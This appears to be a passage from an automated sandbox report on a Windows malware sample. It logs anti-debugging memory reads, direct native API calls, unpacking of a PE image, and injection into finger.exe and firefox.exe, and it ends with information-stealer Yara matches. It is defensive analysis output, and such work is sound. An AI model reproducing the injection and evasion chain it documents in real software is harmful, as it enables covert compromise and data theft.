                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AE8C0 mov eax, dword ptr fs:[00000030h]6_2_011AE8C0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC8F9 mov eax, dword ptr fs:[00000030h]6_2_011BC8F9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BC8F9 mov eax, dword ptr fs:[00000030h]6_2_011BC8F9
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FEB1D mov eax, dword ptr fs:[00000030h]6_2_011FEB1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01248B28 mov eax, dword ptr fs:[00000030h]6_2_01248B28
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01248B28 mov eax, dword ptr fs:[00000030h]6_2_01248B28
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AEB20 mov eax, dword ptr fs:[00000030h]6_2_011AEB20
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AEB20 mov eax, dword ptr fs:[00000030h]6_2_011AEB20
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01228B42 mov eax, dword ptr fs:[00000030h]6_2_01228B42
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01216B40 mov eax, dword ptr fs:[00000030h]6_2_01216B40
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01216B40 mov eax, dword ptr fs:[00000030h]6_2_01216B40
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0124AB40 mov eax, dword ptr fs:[00000030h]6_2_0124AB40
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0117CB7E mov eax, dword ptr fs:[00000030h]6_2_0117CB7E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122EB50 mov eax, dword ptr fs:[00000030h]6_2_0122EB50
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190BBE mov eax, dword ptr fs:[00000030h]6_2_01190BBE
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190BBE mov eax, dword ptr fs:[00000030h]6_2_01190BBE
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120CBF0 mov eax, dword ptr fs:[00000030h]6_2_0120CBF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A0BCB mov eax, dword ptr fs:[00000030h]6_2_011A0BCB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A0BCB mov eax, dword ptr fs:[00000030h]6_2_011A0BCB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A0BCB mov eax, dword ptr fs:[00000030h]6_2_011A0BCB
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180BCD mov eax, dword ptr fs:[00000030h]6_2_01180BCD
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180BCD mov eax, dword ptr fs:[00000030h]6_2_01180BCD
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180BCD mov eax, dword ptr fs:[00000030h]6_2_01180BCD
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AEBFC mov eax, dword ptr fs:[00000030h]6_2_011AEBFC
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188BF0 mov eax, dword ptr fs:[00000030h]6_2_01188BF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188BF0 mov eax, dword ptr fs:[00000030h]6_2_01188BF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188BF0 mov eax, dword ptr fs:[00000030h]6_2_01188BF0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122EBD0 mov eax, dword ptr fs:[00000030h]6_2_0122EBD0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BCA38 mov eax, dword ptr fs:[00000030h]6_2_011BCA38
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A4A35 mov eax, dword ptr fs:[00000030h]6_2_011A4A35
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011A4A35 mov eax, dword ptr fs:[00000030h]6_2_011A4A35
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0120CA11 mov eax, dword ptr fs:[00000030h]6_2_0120CA11
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011AEA2E mov eax, dword ptr fs:[00000030h]6_2_011AEA2E
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BCA24 mov eax, dword ptr fs:[00000030h]6_2_011BCA24
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190A5B mov eax, dword ptr fs:[00000030h]6_2_01190A5B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01190A5B mov eax, dword ptr fs:[00000030h]6_2_01190A5B
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0122EA60 mov eax, dword ptr fs:[00000030h]6_2_0122EA60
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01186A50 mov eax, dword ptr fs:[00000030h]6_2_01186A50
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01186A50 mov eax, dword ptr fs:[00000030h]6_2_01186A50
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01186A50 mov eax, dword ptr fs:[00000030h]6_2_01186A50
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01186A50 mov eax, dword ptr fs:[00000030h]6_2_01186A50
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01186A50 mov eax, dword ptr fs:[00000030h]6_2_01186A50
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01186A50 mov eax, dword ptr fs:[00000030h]6_2_01186A50
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01186A50 mov eax, dword ptr fs:[00000030h]6_2_01186A50
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FCA72 mov eax, dword ptr fs:[00000030h]6_2_011FCA72
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011FCA72 mov eax, dword ptr fs:[00000030h]6_2_011FCA72
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BCA6F mov eax, dword ptr fs:[00000030h]6_2_011BCA6F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BCA6F mov eax, dword ptr fs:[00000030h]6_2_011BCA6F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BCA6F mov eax, dword ptr fs:[00000030h]6_2_011BCA6F
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B8A90 mov edx, dword ptr fs:[00000030h]6_2_011B8A90
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118EA80 mov eax, dword ptr fs:[00000030h]6_2_0118EA80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118EA80 mov eax, dword ptr fs:[00000030h]6_2_0118EA80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118EA80 mov eax, dword ptr fs:[00000030h]6_2_0118EA80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118EA80 mov eax, dword ptr fs:[00000030h]6_2_0118EA80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118EA80 mov eax, dword ptr fs:[00000030h]6_2_0118EA80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118EA80 mov eax, dword ptr fs:[00000030h]6_2_0118EA80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118EA80 mov eax, dword ptr fs:[00000030h]6_2_0118EA80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118EA80 mov eax, dword ptr fs:[00000030h]6_2_0118EA80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0118EA80 mov eax, dword ptr fs:[00000030h]6_2_0118EA80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01254A80 mov eax, dword ptr fs:[00000030h]6_2_01254A80
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188AA0 mov eax, dword ptr fs:[00000030h]6_2_01188AA0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188AA0 mov eax, dword ptr fs:[00000030h]6_2_01188AA0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011D6AA4 mov eax, dword ptr fs:[00000030h]6_2_011D6AA4
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180AD0 mov eax, dword ptr fs:[00000030h]6_2_01180AD0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B4AD0 mov eax, dword ptr fs:[00000030h]6_2_011B4AD0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B4AD0 mov eax, dword ptr fs:[00000030h]6_2_011B4AD0
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011D6ACC mov eax, dword ptr fs:[00000030h]6_2_011D6ACC
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011D6ACC mov eax, dword ptr fs:[00000030h]6_2_011D6ACC
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011D6ACC mov eax, dword ptr fs:[00000030h]6_2_011D6ACC
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BAAEE mov eax, dword ptr fs:[00000030h]6_2_011BAAEE
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011BAAEE mov eax, dword ptr fs:[00000030h]6_2_011BAAEE
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01208D20 mov eax, dword ptr fs:[00000030h]6_2_01208D20
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_011B4D1D mov eax, dword ptr fs:[00000030h]6_2_011B4D1D
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01176D10 mov eax, dword ptr fs:[00000030h]6_2_01176D10
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01176D10 mov eax, dword ptr fs:[00000030h]6_2_01176D10
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01176D10 mov eax, dword ptr fs:[00000030h]6_2_01176D10
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119AD00 mov eax, dword ptr fs:[00000030h]6_2_0119AD00
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119AD00 mov eax, dword ptr fs:[00000030h]6_2_0119AD00
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_0119AD00 mov eax, dword ptr fs:[00000030h]6_2_0119AD00
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01238D10 mov eax, dword ptr fs:[00000030h]6_2_01238D10
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01238D10 mov eax, dword ptr fs:[00000030h]6_2_01238D10
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180D59 mov eax, dword ptr fs:[00000030h]6_2_01180D59
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180D59 mov eax, dword ptr fs:[00000030h]6_2_01180D59
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01180D59 mov eax, dword ptr fs:[00000030h]6_2_01180D59
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188D59 mov eax, dword ptr fs:[00000030h]6_2_01188D59
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188D59 mov eax, dword ptr fs:[00000030h]6_2_01188D59
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeCode function: 6_2_01188D59 mov eax, dword ptr fs:[00000030h]6_2_01188D59
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeMemory written: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: NULL target: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeSection loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeThread register set: target process: 5828Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeThread APC queued: target process: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeProcess created: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe "C:\Users\user\Desktop\72STaC6BmljfbIQ.exe"Jump to behavior
                Source: C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: PWhloTdOLAusO.exe, 00000007.00000000.1840841539.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269435810.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3270865093.0000000000DE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: PWhloTdOLAusO.exe, 00000007.00000000.1840841539.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269435810.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3270865093.0000000000DE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: PWhloTdOLAusO.exe, 00000007.00000000.1840841539.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269435810.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3270865093.0000000000DE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: PWhloTdOLAusO.exe, 00000007.00000000.1840841539.0000000000DE1000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 00000007.00000002.3269435810.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp, PWhloTdOLAusO.exe, 0000000B.00000002.3270865093.0000000000DE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeQueries volume information: C:\Users\user\Desktop\72STaC6BmljfbIQ.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\72STaC6BmljfbIQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 6.2.72STaC6BmljfbIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.72STaC6BmljfbIQ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3268946749.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3268484619.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1924713892.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1924159868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3270119796.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3269214362.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1926555511.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
